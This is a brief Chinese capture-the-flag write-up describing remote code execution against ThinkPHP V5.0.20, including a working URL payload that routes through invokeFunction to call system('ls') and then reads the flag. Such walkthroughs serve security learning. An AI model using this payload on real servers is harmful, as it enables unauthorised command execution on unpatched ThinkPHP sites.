输入网址发现当前thinkphp版本为V5.0.20
考虑到此题目可以通过构建RCE
首先需要构建payload
?s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
system函数是用来执行外部应用程序的,通过&将其与我们要执行的ls(dir)连起来,列出当前的目录和文件的。
当前目录没有找到,尝试查看根目录,发现flag。
打开flag,成功得到flag。